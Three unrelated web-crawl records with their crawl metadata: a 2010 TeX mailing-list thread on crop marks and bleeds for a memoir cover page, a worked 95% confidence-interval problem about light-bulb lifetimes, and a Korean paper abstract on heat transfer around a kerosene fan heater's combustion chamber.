# [OS X TeX] [Slightly OT] Crop marks over a full page image David Watson dewatson at me.com Sat May 15 15:29:56 CEST 2010 Thanks to everyone for the suggestions. I may yet have to use them for this project, if the printer doesn't like what I have now. I was able to do most everything with the functionality provided by memoir. For anyone interested in taking a look at the layout of the Book of Abstracts, I have placed a copy on our webserver: http://www.malto2010.org/BoA.pdf On May 14, 2010, at 11:58 PM, Axel E. Retif wrote: > On 14 May, 2010, at 20:44, David Watson wrote: > >> I am currently in the process of compiling a book of abstracts for a meeting-in-miniature. >> For this work, I am using the document class memoir. >> The printer want bleeds for the cover page of 0.125 inches, and crop marks, which I've figured out how to do for the remainder of the document (resetting the \stockheight and \stockwidth and using \settrims. >> The cover page is a real doozy, however, because the bleeds cover the crop marks. > > > On 14 May, 2010, at 22:40, Alan T Litchfield wrote: > >> I am surprised the printer is asking you to do this. > > > I don't think it is uncommon, and it's not that hard ---I use a combination of geometry and crop packages for that. > > And for the bleeding, the package sidecap (even without a caption!) comes handy, as with it a wide environment is defined; it allows to use the margin area, e. g., for figures wider than \textwidth'' ---just don't make the image so big as to cover the crop marks. Some manual adjustment might be necessary; for example, for a frontispiece I did > > \thispagestyle{empty} > \begin{figure}[h!] > \vspace*{-8.5pc} > \begin{wide} > \hspace*{-6.6pc}\includegraphics{frontispicio_cred_8pt} > \end{wide} > \end{figure} > > > Best, > > Axel > > ----------- Please Consult the Following Before Posting ----------- > TeX FAQ: http://www.tex.ac.uk/faq > List Reminders and Etiquette: http://email.esm.psu.edu/mac-tex/ > List Archive: http://tug.org/pipermail/macostex-archives/ > TeX on Mac OS X Website: http://mactex-wiki.tug.org/ > List Info: http://email.esm.psu.edu/mailman/listinfo/macosx-tex >
2023-02-06 23:22:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8891311287879944, "perplexity": 4644.998729894857}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500365.52/warc/CC-MAIN-20230206212647-20230207002647-00102.warc.gz"}
https://novelanswer.com/a-random-sample-of-100-light-bulbs-has-a-mean-lifetime-of-3000-hours-assume-that-the-population-standard-deviation-of-the-lifetime-is-500/
# Solved (Free): A random sample of 100 light bulbs has a mean lifetime of 3000 hours. Assume that the population standard deviation of the lifetime is 500 #### ByDr. Raju Chaudhari Apr 3, 2021 A random sample of 100 light bulbs has a mean lifetime of 3000 hours. Assume that the population standard deviation of the lifetime is 500 hours. Construct a 95% confidence interval estimate of the mean lifetime. #### Solution Given that sample size $n = 100$, sample mean $\overline{X}= 3000$ and population standard deviation $\sigma = 500$. #### Step 1 Specify the confidence level $(1-\alpha)$ Confidence level is $1-\alpha = 0.95$. Thus, the level of significance is $\alpha = 0.05$. #### Step 2 Given information Given that sample size $n =100$, sample mean $\overline{X}=3000$ and population standard deviation is $\sigma = 500$. #### Step 3 Specify the formula $100(1-\alpha)$% confidence interval for the population mean $\mu$ is \begin{aligned} \overline{X} - E \leq \mu \leq \overline{X} + E \end{aligned} where $E = Z_{\alpha/2} \frac{\sigma}{\sqrt{n}}$, and $Z_{\alpha/2}$ is the $Z$ value providing an area of $\alpha/2$ in the upper tail of the standard normal probability distribution. #### Step 4 Determine the critical value The critical value of $Z$ for given level of significance is $Z_{\alpha/2}$. Thus $Z_{\alpha/2} = Z_{0.025} = 1.96$. #### Step 5 Compute the margin of error The margin of error for mean is \begin{aligned} E & = Z_{\alpha/2} \frac{\sigma}{\sqrt{n}}\\ & = 1.96 \frac{500}{\sqrt{100}} \\ & = 98. \end{aligned} #### Step 6 Determine the confidence interval $95$ % confidence interval estimate for population mean is \begin{aligned} \overline{X} - E & \leq \mu \leq \overline{X} + E\\ 3000 - 98 & \leq \mu \leq 3000 + 98\\ 2902 & \leq \mu \leq 3098. \end{aligned} Thus, $95$% confidence interval for the mean lifetime is $(2902,3098)$.
2022-05-17 13:38:55
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9996607303619385, "perplexity": 601.9181888132694}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662517485.8/warc/CC-MAIN-20220517130706-20220517160706-00262.warc.gz"}
http://www.koreascience.or.kr/article/ArticleFullRecord.jsp?cn=DHGGDU_1998_v22n4_551
Heat transfer characteristics around a circular combustion chamber of kerosene fan heater Title & Authors Heat transfer characteristics around a circular combustion chamber of kerosene fan heater Kim, Jang-Gwon; Abstract This paper was studied to understand the characteristics of heat transfer coefficients and surface temperature distributions around a circular combustion chamber within the heat-intercept duct of kerosene fan heater. The experiment was carried out in the heat-intercept duct of kerosene fan heater attached to the blow-down-type subsonic wind tunnel with a test section of 240 mm * 240 mm * 1200 mm. The purpose of this paper was to obtain the basic data related with normal combustion for new design from conventional kerosene fan heater, and to investigate the effect of surface temperature, local and mean heat transfer coefficients versus flow-rate of convection axial fan according to the variations of heat release conditions from kerosene fan heater during normal combustion. Consequently it was found that (i) the revolution of convection axial fan during combustion had a smaller value than that of non-combustion because of the thermal resistance due to the high temperature in the heat-intercept duct, (ii) the pressure ratio P$\small{_{2}}$/P$\small{_{1}}$ had a comparatively constant value of 0.844 according to the revolution increase of turbo fan and the heating performance of kerosene fan heater had a range of 1,494 ~ 3,852 kcal/hr, (iii) the local heat transfer coefficient around a circular combustion chamber had a comparatively larger scale in the range of 315 deg. < .theta. < 45 deg. than that in the range of 90 deg. < .theta. < 270 deg. as a result of heat transfer difference between front and back of a circular combustion chamber, and (iv) the mean heat transfer coefficient around a circular combustion chamber increased linearly like a H$\small{_{m}}$=95.196Q+104.019 in condition of high heat release according to the increase of flow-rate of axial fan.n. Keywords Language Korean Cited by
2018-03-20 12:14:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 3, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.49687615036964417, "perplexity": 1487.5855829894006}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257647406.46/warc/CC-MAIN-20180320111412-20180320131412-00704.warc.gz"}